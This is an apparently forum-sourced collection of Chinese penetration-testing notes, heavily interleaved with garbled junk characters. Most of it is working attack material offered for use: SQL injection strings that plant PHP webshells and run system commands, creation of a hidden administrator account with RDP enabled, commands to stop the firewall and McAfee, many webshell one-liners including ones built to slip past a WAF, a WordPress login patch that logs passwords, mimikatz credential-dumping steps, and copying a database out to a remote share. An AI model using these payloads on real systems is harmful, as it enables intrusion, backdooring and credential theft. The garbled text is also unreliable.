5 t- X: _: h" g$ p# Y# b# ZEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''') 5 E# i! ~$ C1 A3 n6 I+ i5 j- f* k& j( Y, o3 }+ @% c
postgresql注射的一些东西 1 [3 X3 c) ]4 F' F( ]) N9 w如何获得webshell2 [4 G& q* P$ p+ @/ D http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); " W+ ?4 F, n( Z2 h http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); 6 }/ m" Z1 r; K: e' S9 a- y* `( q4 ahttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$; ! S, n+ K9 L/ E( g如何读文件 ( \) H6 u2 D2 W! B& f# Y" Xhttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);4 `, d2 R# a3 t% a! h http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;/ A9 S* N- s! y3 u http://127.0.0.1/postgresql.php?id=1;select * from myfile; 2 R3 N5 D4 J8 S1 S: }0 h9 k6 v# l- j1 J1 o' L& q! ]( e
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。* C2 g) @; ?: M6 k0 t. u' I
当然,这些的postgresql的数据库版本必须大于8.X1 s0 C7 l. Q1 Q% _
创建一个system的函数:* {' f: {5 V( g" X4 L4 K5 O# {! b# H
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT# X L$ X( z* B' C
/ A7 C, z% d. Z6 [# o) B
创建一个输出表:/ E/ D" @; C/ c6 g( |; |
CREATE TABLE stdout(id serial, system_out text) 4 |$ ^! r5 E9 K+ x' j9 m: j/ g! l' a; X" p- t! t+ z
执行shell,输出到输出表内: * s" O* \; |; `" |, WSELECT system('uname -a > /tmp/test') ' k# Y8 v, A& i( j, Z2 j! [' T w
copy 输出的内容到表里面;7 e7 D6 A" ?1 B% p# k" W5 u, B" R
COPY stdout(system_out) FROM '/tmp/test' 5 J F5 H9 G1 Y. M }8 l" B) o" s ( e# H* [. a* I" B E. s从输出表内读取执行后的回显,判断是否执行成功 - a. J% N1 s! K# J, L. k& E: { S& x9 }; w1 S/ ?4 a) M
SELECT system_out FROM stdout! v- ^7 T6 U5 k) k( G" t {
下面是测试例子+ g% H# g3 o2 h6 L0 x5 e
, K. `5 P, c r9 i; r# V/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- # i D& d& w. ]# @2 S
1 w- f& J# n6 |/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C' 1 V* F; }3 A; NSTRICT -- & e5 i; h$ W4 [8 e h1 d. i7 G6 j) D+ Q9 G8 l
/store.php?id=1; SELECT system('uname -a > /tmp/test') --: U% V- Q' E9 w1 r% s% v
0 g' K( ?- k2 ~" v, n# d; @0 z2 p+ h/ l
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --: b& R* x' r) h, Q8 q3 q% V) o# b
$ M8 @ p+ f8 o: ~, w4 `* A0 v
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1-- 9 U/ b* ~+ r) C; M! L+ r4 v! Enet stop sharedaccess stop the default firewall N* @" l$ n# }netsh firewall show show/config default firewall , o$ r9 n, k( G8 i; v6 C+ nnetsh firewall set notifications disable disable the notify when the program is disabled by the default firewall ! t& p5 Z) j" {/ F& X( qnetsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall. Q" w; J: u5 ?2 Z4 E" I
修改3389端口方法(修改后不易被扫出); Q: I6 o' E. D# O5 q
修改服务器端的端口设置,注册表有2个地方需要修改% n% O4 M. Y& F2 M% Y* v; N- I
' [2 l) `0 P* i I[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]" ? c2 M8 T. e7 R0 i5 x; v
PortNumber值,默认是3389,修改成所希望的端口,比如6000 * x2 ^4 [8 T! u- d% X( m& Y W/ w9 [! P
第二个地方:" U+ z$ [1 o6 b9 U# |
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] ' r0 Z8 u( F: e8 U. cPortNumber值,默认是3389,修改成所希望的端口,比如6000 4 Q, b% T& V( @6 M ?/ O1 d 8 k$ ^: {1 j: `7 X现在这样就可以了。重启系统就可以了 - Q5 H: a* e& n3 U: m" L( R6 M0 N8 _9 E& }1 Y, o# [2 q
查看3389远程登录的脚本 2 _1 O% @* J$ m4 v( O' {保存为一个bat文件 . R N( x* [1 X2 l) T& gdate /t >>D:\sec\TSlog\ts.log1 W3 ^6 P8 ^/ j. C
time /t >>D:\sec\TSlog\ts.log 1 z: F$ m. V! \9 F& _# tnetstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log ; o# J8 R; w" _7 J+ ostart Explorer! ?& |) J7 i5 b* j0 f) X( m! v
& a- a1 o6 O0 a3 C6 I1 I5 _
mstsc的参数: N, |+ X& A3 W# N1 }( ?# r+ S3 Q2 Q$ ?4 Q
远程桌面连接* n% [! ~1 @+ e2 w* h
3 g$ c! J+ h# i: {) |1 B" LMSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]4 V# K9 o c. p" l1 z$ ~
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /? 9 T! v* U4 [! b r7 W4 e z0 k0 [7 `% y4 b/ ?4 e( X
<Connection File> -- 指定连接的 .rdp 文件的名称。 6 G; l' R2 |3 b2 j( m: ^: M, W- w2 P/ I3 e+ S; j# B" c: F
/v:<server[:port]> -- 指定要连接到的终端服务器。 5 [, X7 l6 K6 g" |0 u+ r- t1 F" j: [' V$ Y
/console -- 连接到服务器的控制台会话。9 D1 Y0 y4 ^! K( k0 O y
; k1 s, V3 B% z/ [- ]; ], _+ e; V
/f -- 以全屏模式启动客户端。1 O$ N( v5 u' v9 j c# c) \
7 p' N- R1 f J0 |* ^7 j. i
/w:<width> -- 指定远程桌面屏幕的宽度。 ' Y9 @5 Z! y! r7 d# D! i 6 ~, j& l" `8 V0 L# b$ [$ c1 r/h:<height> -- 指定远程桌面屏幕的高度。 / N( c' [9 X! R0 V2 o2 |9 d/ I8 b2 ]: ^; e, x" _
/edit -- 打开指定的 .rdp 文件来编辑。0 }: y ~5 l* H6 T, ?$ j& C
! q6 _0 Y0 d3 B# `/ s
/migrate -- 将客户端连接管理器创建的旧版3 A5 G+ C$ y! l" u! B6 u! ]
连接文件迁移到新的 .rdp 连接文件。 0 C) ?. v Y% L. N! V3 o# M $ Z' ]' T1 c1 U8 U) e$ G( y' q- F
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就 ) c1 {3 f/ X- rmstsc /console /v:124.42.126.xxx 突破终端访问限制数量 9 k' V+ d& F" |- ^1 O8 H }( Z7 c+ X/ p4 Y7 F' I
命令行下开启3389 n! K0 h7 R- p) @8 t# H% h. `: nnet user asp.net aspnet /add 9 t/ V \/ ^! m) B4 D3 wnet localgroup Administrators asp.net /add1 I6 m, I7 r5 d# m8 r; ~+ W
net localgroup "Remote Desktop Users" asp.net /add z0 A' K3 q. m' z
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D + `' b/ Z6 l5 k! b. T) w" l& }9 vecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 02 J2 D) c! m9 G
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1 1 S! ?9 ^' Y4 Y; v+ Zecho Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f& F$ O% | i; |" r3 R/ C$ B
sc config rasman start= auto 1 C- R% K" t/ N: |7 ^. hsc config remoteaccess start= auto5 Q; O, U3 `# y+ z- G, K
net start rasman9 N F" I# W* H) h: X( i7 c
net start remoteaccess + a/ S$ j9 U. \+ FMedia6 P4 y5 i+ K& U/ n
<form id="frmUpload" enctype="multipart/form-data"3 t2 T5 e9 w, [9 j$ d% Z" q
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br> , ]- Q# V( t/ P- Z, u7 H1 Z<input type="file" name="NewFile" size="50"><br>$ k8 z! F" G2 i: T
<input id="btnUpload" type="submit" value="Upload">4 C, e# h3 U: S7 Q# f
</form> % U+ b. ~- }9 `5 H7 ?4 z" c; e) Y1 d9 m$ N/ ~1 S0 t! t; P; x
control userpasswords2 查看用户的密码8 q* D! Y2 |0 t8 F$ W& a& T
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径8 w* M- `; I% i6 r. Z
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a4 p, u2 P7 {, t1 s9 @1 Z3 [
: C3 M. T6 I, K. f$ f0 K+ }! M1 m
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据: % ]) h& Q+ B4 t. y测试1:1 n1 b7 K( l: ]8 z' X) M
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1 4 |8 {4 K" F$ q6 A- x1 | # c% n i" z4 U测试2: # }/ \6 `" V$ Z" ~+ U% v, v( l) T N) ^! ]3 W! T& S; Y
create table dirs(paths varchar(100),paths1 varchar(100), id int)2 M/ f* l5 J) t
8 ]1 _7 x1 f4 Z! A
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1-- 5 r( l# C" u% M' u, U, p % Y8 w8 f& c% \" ]4 i: JSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1 ; ]0 W5 b7 h- K# G关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令/ m+ X4 Q1 y& r. S; Y( Q
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制; ) x- N- z1 i; z1 b1 ]; N" L- z2 Y5 E! Vnet stop mcafeeframework0 {! E6 h. J5 Z& X. B- w1 q( c4 c5 `
net stop mcshield 1 f a2 j5 d1 m3 f: Z5 Znet stop mcafeeengineservice( f3 d6 \. e8 `! a8 J
net stop mctaskmanager / T- ~; `& h' Q4 `* Y* i' Thttp://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D$ b2 _" Y& k& }- f2 \3 d' A2 {1 G
6 J0 z; T& @9 o; M& ^
VNCDump.zip (4.76 KB, 下载次数: 1) & h# O1 \9 S2 [' Y$ a( N* v$ t" @
密码在线破解http://tools88.com/safe/vnc.php 8 @8 S+ u* Z$ N) j* M+ x; JVNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取 7 y e# e4 q. z* N' Q0 I+ v" r" V5 B
exec master..xp_cmdshell 'net user'! K- h6 g- w5 n
mssql执行命令。- c3 h' ?; z v5 M [
获取mssql的密码hash查询 ( A& Z& w' P# D% P$ Oselect name,password from master.dbo.sysxlogins + \6 b& S5 _0 i8 `5 D " s% f. i3 h( p5 Mbackup log dbName with NO_LOG;. a0 i& e) ~ W) h1 N
backup log dbName with TRUNCATE_ONLY;. o/ i4 b( o7 }( G% _, d5 S) ]
DBCC SHRINKDATABASE(dbName);" T4 E, z$ l" h
mssql数据库压缩 s# a1 O+ L+ T/ P1 |# E0 M2 N2 L9 u7 ~$ e5 p8 }; Z A6 O% i
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK + _6 L( Y3 P* r将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。% k' ^3 N" d8 u& Y
) U. d. f1 i& J4 J% sbackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'7 }& K+ g. k0 E; G; d" M
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak1 g/ a& e' p. M- |8 P; I
/ H# _/ a0 b2 M' L2 U$ jDiscuz!nt35渗透要点: , J. y1 o; {8 q(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default 8 i3 m3 h j+ ]! g# V) {(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%> 5 ?7 d; E3 B' d4 e(3)保存。: F+ L9 n& G/ w) Y
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass ; Z1 n- U4 q4 M9 V R1 od:\rar.exe a -r d:\1.rar d:\website\ 8 z: ~8 D5 T! u; l递归压缩website0 M+ x( o# J4 e4 `
注意rar.exe的路径 7 ~1 D" ? [% q- h% s# x* h. B' i" V/ {6 n( q
<?php " ^9 _% r0 X, o' @% k 9 Q( s+ T! v2 S ?6 \5 Z) D$telok = "0${@eval($_POST[xxoo])}";! i" q) w: W+ `+ _1 `2 a
: q9 U, G4 o# y1 \$username = "123456";7 _, ] R+ a; U* Z! f3 E. \+ N
0 S0 a- g. i5 j: @. [$userpwd = "123456";/ i' X) y( c5 s( L; k3 c5 i
3 }! x" N0 m( H' \' {6 a
$telhao = "123456";2 L# F: z I5 L3 n a8 Y' ?
) V/ c( F+ c- C0 v5 g8 l- G
$telinfo = "123456"; 6 p X6 D2 g4 R7 L( B0 \3 c; G3 k8 K) M; R, r* f. Y$ e+ v
?>+ H L# V* V5 D& d8 E& l' v7 F
php一句话未过滤插入一句话木马8 X! e, q0 X% p
1 v0 v5 F4 m; K% X9 z) D站库分离脱裤技巧0 ]( w* L& I* S# K3 L5 J% c6 ?
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"' - ?. i' r; J0 X* s- ]/ h2 Cexec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'7 L8 {4 @8 h* E8 G2 S' }# d9 M+ }
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。: K" U1 P/ r R: d2 B, H
这儿利用的是马儿的专家模式(自己写代码)。& a% M2 t7 }3 m( |
ini_set('display_errors', 1);. V; {5 c0 A/ k% ~
set_time_limit(0); 2 W4 v2 L* u+ _error_reporting(E_ALL); ; }, a7 g( z4 g$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());, g6 Z; m; c0 K l* S
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());& S' r9 q% {: h: w1 L
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error()); " g* k2 l4 G; a" G2 T" N2 p+ z$i = 0;; C. O: r8 p9 S* ]- X
$tmp = '';! r) b( a; M5 D
while ($row = mysql_fetch_array($result, MYSQL_NUM)) { * O' B) t) i# J0 x$ g $i = $i+1; 8 V+ ^' S( {* N4 J! k5 [/ I1 p5 W $tmp .= implode("::", $row)."\n";" m5 z+ K3 }/ o/ n% ?2 f
if(!($i%500)){//500条写入一个文件6 N, Q% i, _2 w. T7 b: u1 c: y
$filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';4 T+ e( q' ~; m/ `
file_put_contents($filename,$tmp);. l% k: r7 l0 f% [: E0 R3 S+ V
$tmp = '';1 h6 {% l$ x3 U% O
}( x& {% S+ i3 ]5 ~- V* Q
}3 W8 I7 q5 [. ]4 A) C) E' m! V
mysql_free_result($result);7 D; \7 C: { k
$ U3 n! C4 K) D- B9 J' u; [' o) I7 f& p y& B8 b' Y
3 o M# p) M8 V+ O//down完后delete , L7 I7 O" ]9 T$ W" W+ F( Z' M, M9 z ^+ z
X0 l4 v0 G3 _+ B- c/ u
ini_set('display_errors', 1); ; O9 s1 V& C2 V* perror_reporting(E_ALL);# f3 s! k5 |) D& y, S
$i = 0;( {$ ]7 }, t9 r g9 E
while($i<32) { 3 I) s- U: e- I6 p: k- p" W $i = $i+1;! }9 b* H, j( T3 V
$filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';& m% R) @! _! ?$ z8 \3 J
unlink($filename); 2 f2 k1 A) Z1 t" s/ s" E0 J} . p# j2 u$ I5 g9 y0 _" D( `
httprint 收集操作系统指纹 * v% ~# S# u* h6 j- P( ]扫描192.168.1.100的所有端口 2 p, w* \! Q, C( Z4 L# {/ m6 Lnmap –PN –sT –sV –p0-65535 192.168.1.1000 A' }, z) ?/ k7 M p* j# u$ L, B
host -t ns www.owasp.org 识别的名称服务器,获取dns信息 p* B9 ^( S6 shost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输 ' h3 U5 @+ N d1 Y) T3 aNetcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host & n$ U" d ^1 s/ ?7 ]) T: }! B2 w3 ~' K
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册) . l) g. F. w" t0 G9 t$ `( ?; B: w4 f1 e/ f3 [
MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号) * v* ?! A* A* I8 H. a) _# l' r% d- _0 S7 C/ |1 v
Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x * q' \) b5 m! C* S0 q; [* i1 v2 u8 L
DNSstuff: http://www.dnsstuff.com/ (有多种服务可用) % }/ t* e1 S% ?" Y5 e- b# t4 L# K6 t* [$ k [ http://net-square.com/msnpawn/index.shtml (要求安装); ]: c% [$ |# n& [% j0 f5 r' V; ~' r
: J" W% T: K. | tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的) ) g S0 h- N2 W+ i( r9 W% x& m( o , @& G4 p j9 C/ \ SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找) ! N$ A, P, I4 P# p& b3 @' Iset names gb2312/ u: H4 Z8 y( Y7 v t, n; y3 Z
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。; \- l7 j& `7 p* g2 Z8 Z9 }
9 d& F- h# Q; `mysql 密码修改5 @; z! \2 R6 [/ |0 I) x
UPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” / ?% y' Z* r! U$ ]& L' pupdate user set password=PASSWORD('antian365.com') where user='root'; 1 C& W: y+ m. l4 gflush privileges; * _: U- m# Q+ Q0 A高级的PHP一句话木马后门" u6 d; F- d( ]7 }2 Y
# c. g1 k1 X/ p( G/ c, o入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀) l9 u8 q4 e1 k, T' X7 K
, X; h# C) G7 B
1、 4 `% ~' n0 }; r: m % B/ `1 D0 y- t* l& Y$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";4 f- w- F' ~2 ~9 u
* v. N \ {3 `' w1 |6 j
$hh("/[discuz]/e",$_POST['h'],"Access"); 2 R5 j" |8 J1 ^4 S9 T: ~8 {/ W4 s; r6 H( d& B
//菜刀一句话; S8 y5 ?( e1 i2 i4 l' C) P
6 D. f" E# c4 U& C/ p/ U. c- ~2、7 u% A5 f; }) ?0 N3 `' L
4 H2 x" u$ b7 }0 v w3 P
$filename=$_GET['xbid'];7 j. z- h: ~& k* j( U: o* X
7 f' D0 J, \$ j+ L, f$ G" F4 R) v/ ?# |
include ($filename);& g' g9 X ~9 B* M2 `
6 f, q7 i" P. A) r Q
//危险的include函数,直接编译任何文件为php格式运行 ' o0 O8 F! Z. ] v5 V 5 |+ K9 _+ A. w" m7 D3、8 ^- k4 i9 T7 R3 k, Y" c0 L% P
t2 k( f B7 \* y/ [" H$reg="c"."o"."p"."y";2 M: _" Q# Z& w" u
5 |- i( Y9 r w8 P. Y" w$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);& H3 Q- w' n; x, e1 o
' y& e; s' n' q ]7 ~: q& X/ P/ d//重命名任何文件 ( d! b x: f$ d9 ~1 e" r! ?# l9 R3 |
4、7 f0 Q% d! ^% b+ f+ E
1 B3 d G: x" {" H. Q
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e"; 8 n) S% p. |2 Q1 O % i3 X8 a9 @" c9 p1 l! v$gzid("/[discuz]/e",$_POST['h'],"Access"); + ?% p) y$ u( D5 t! ^/ d% s+ s, u- x* S# }9 t! }) [; z
//菜刀一句话( w- S& w) `! E. t! @& ^
' c' a( y2 \, V7 e1 J8 c6、典型一句话: B, k. ]9 T4 l0 @% b/ n
7 t1 e! g( c1 b( N# f0 I
程序后门代码) L" A5 z( R$ Y p5 q9 ~
<?php eval_r($_POST[sb])?> # ^# j( U2 @0 ], m9 n T# S程序代码 $ R) V$ _) Z; A: ?) ^$ n$ ]! x<?php @eval_r($_POST[sb])?> & u V3 C/ S/ C//容错代码: y2 e. i) D0 ]& j+ B0 U
程序代码 + v' g" v# P5 J$ i6 B<?php assert($_POST[sb]);?>7 r5 d7 u7 h2 A9 M' ~) ~% q
//使用lanker一句话客户端的专家模式执行相关的php语句 ( Z2 C8 b3 P( `' Y程序代码2 _. u1 M, e O; X
<?$_POST['sa']($_POST['sb']);?>, T4 D* g+ E; X' R6 Q: W* W, U. q; K+ r
程序代码3 Q1 h* i4 s. n) o y
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>7 e) d( H* `0 O$ r) q1 Y
程序代码 4 F9 W+ {; w8 K$ U4 B7 r<?php - m& \/ q0 [8 Q: m, h: c@preg_replace("/[email]/e",$_POST['h'],"error");8 }1 F8 u+ S) k7 [9 }
?> 7 {' u. f1 Q4 [" k8 q//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入 / _* A+ s6 f: o( U9 w1 l程序代码! W3 ^& @ Q! z9 T. P
<O>h=@eval_r($_POST[c]);</O> , W$ H3 ]/ W. ]! A5 L# r; l程序代码 5 X @8 q" ?$ G3 d, a<script language="php">@eval_r($_POST[sb])</script> 2 j& O; }+ h2 m//绕过<?限制的一句话 1 S* k9 v" S' ?# Z$ q1 l " [" \+ _4 U* O7 {9 B, Shttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip8 j5 K$ L( Z" z- V
详细用法: D6 d3 [9 g" f1、到tools目录。psexec \\127.0.0.1 cmd # H3 t9 N J+ @4 X) Q2、执行mimikatz, N( }- a6 K# `9 E8 R
3、执行 privilege::debug1 Y$ q$ |3 t+ B$ t
4、执行 inject::process lsass.exe sekurlsa.dll * R. r" n; M5 c3 f X4 e5、执行@getLogonPasswords; F0 J0 J! t9 Q' O: i* V, d
6、widget就是密码 4 X. U& o* F0 Z& M+ t$ x( w7、exit退出,不要直接关闭否则系统会崩溃。 & @% u! ^3 P0 F0 x/ x1 |4 z: u" c: d1 \. E* m7 G9 t5 X1 A: t- F5 s http://www.monyer.com/demo/monyerjs/ js解码网站比较全面 " D+ P' n7 f/ _# r+ n- B5 L , h: W2 h2 y- S% e' k自动查找系统高危补丁3 U; B7 H/ T( u7 {' W5 z3 S5 `
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt3 u( P3 h+ `& x" A7 O) f: \
- d, @: `3 ?8 \6 C6 y突破安全狗的一句话aspx后门+ U5 n7 b) ~; t
<%@ Page Language="C#" ValidateRequest="false" %> : K5 N4 D% K: r. Q7 y<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%> ( \! O' V; y+ t3 N8 f& z% B" Swebshell下记录WordPress登陆密码 ( L: E# d& w: \webshell下记录Wordpress登陆密码方便进一步社工9 E4 } L' @/ t- S: i1 K6 }0 m {
在文件wp-login.php中539行处添加: 3 ?' U% E, u- ]9 `0 }3 T: y; d// log password 5 n1 Q: H( A+ Y+ p k$log_user=$_POST['log'];/ }9 p. M9 g! c1 i, G5 C9 y% m& f: c
$log_pwd=$_POST['pwd'];7 z$ a( O+ p! F: ~3 I* F4 l9 U
$log_ip=$_SERVER["REMOTE_ADDR"];% p, c2 P% O7 x+ U
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip; 0 S8 ]" F5 l; B7 ?$txt=$txt.”\r\n”; & G8 z& _" p9 {if($log_user&&$log_pwd&&$log_ip){ - V& f5 T) K3 K6 r9 E@fwrite(fopen(‘pwd.txt’,”a+”),$txt);2 U' ]9 t5 ^& a, V
} % J/ F: w# H$ z8 ]; R+ N当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。7 f1 `- F( @ _9 a/ A; k
就是搜索case ‘login’ . I* L) ?5 Q+ Q1 {1 |7 h6 A: d& ]在它下面直接插入即可,记录的密码生成在pwd.txt中,7 n: k* X1 B5 G$ o% A
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录3 f9 t' }! I; f- e) t1 g
利用II6文件解析漏洞绕过安全狗代码: ^3 O+ I) S7 t/ a# o
;antian365.asp;antian365.jpg0 W5 Q* Y# t9 |4 }5 q! x2 i& ^
* @; N+ p6 I% e/ I. a
各种类型数据库抓HASH破解最高权限密码! * k4 ~1 U% c6 A, @5 g/ M8 j, l$ `1.sql server2000 4 a. ?8 i' g/ G+ u9 L& |SELECT password from master.dbo.sysxlogins where name='sa' 7 z& n7 S2 i8 ]. \0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED2503410 a e$ Z8 N% K0 _2 F& }# w
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A ; }' O/ f9 q, _' G: [- M/ T# h) ]; k. D! l+ w. i: M% W
0×0100- constant header 1 d" k, l( ]3 ]+ p5 ?. ?/ f34767D5C- salt / e; A6 ]( ^# [) {0 f: ?0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash5 @; g* ~; v4 L. A, X \
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash 2 N' S( o8 p# @ U0 ycrack the upper case hash in ‘cain and abel’ and then work the case sentive hash) g0 | j9 s) \2 \
SQL server 2005:- q& b, T/ h6 N* g# v# v5 V0 K
SELECT password_hash FROM sys.sql_logins where name='sa' j2 p W% t% x- W) Y0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F 1 ^ l' ^* B9 A" i$ L0×0100- constant header5 }! x0 e- |9 ]0 r4 x
993BF231-salt4 }, U, O s, l2 Q2 v$ L
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash' c E5 Y8 e8 M' a7 C
crack case sensitive hash in cain, try brute force and dictionary based attacks. 8 w% Q2 I. S( U) Z: F! m7 t: {& I 2 u8 o8 L+ T; bupdate:- following bernardo’s comments:-2 |* P( v- ]/ v+ Y
use function fn_varbintohexstr() to cast password in a hex string. 3 U$ e2 J" o {. `% z" H' {e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins 7 @, ] }' f7 x* C9 I& W- [; {% n# t/ L# L
MYSQL:- 2 J! c+ q/ J6 c6 w" G" @, Z+ l ! _6 E5 s+ X+ _! ~3 \In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2. : P5 N5 g" x5 c& I0 |$ c& x4 O- k) ]2 {; o2 C
*mysql < 4.1) C6 m4 a4 K7 [( f& y2 B- r
' o8 A( P0 e5 S* F {mysql> SELECT PASSWORD(‘mypass’);! j8 @1 J4 x+ L! l, Y
+——————–+ 2 s# k" O3 y O% q& o: }* r| PASSWORD(‘mypass’) |' x, s. N& O! g1 }, @3 A
+——————–+, J6 E: a* q3 K( K# N% \- ^
| 6f8c114b58f2ce9e |$ q# ~8 D' k2 b: N+ B
+——————–+' n- Q- u4 M. i5 o) A9 Y
8 e+ V* f' i% r7 O4 ?6 F/ w7 ~. D*mysql >=4.1' `) D- t3 ~# g& w6 K
+ _6 |& z; \0 C8 G2 m) r' [! L
mysql> SELECT PASSWORD(‘mypass’); 2 b, P$ u2 \. `: S+——————————————-+ * S7 S' a* c" A$ Y- A1 H| PASSWORD(‘mypass’) | 4 c. }9 l0 Q. \" _& ~- G w+——————————————-+% ~2 t- |) h9 D6 }
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |. T" |" x, z" g1 `, x
+——————————————-+0 M/ i" L: m4 \# s% z1 _
1 x7 k! z6 Y0 V) x* i
Select user, password from mysql.user 8 R8 T5 F2 Y0 h0 a7 X' vThe hashes can be cracked in ‘cain and abel’& `2 J: B3 _$ ^: e: N
0 s& s, N8 H7 O+ G$ xPostgres:-0 j4 R% P+ x |
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)2 i( x8 k& E4 O8 W, g- o
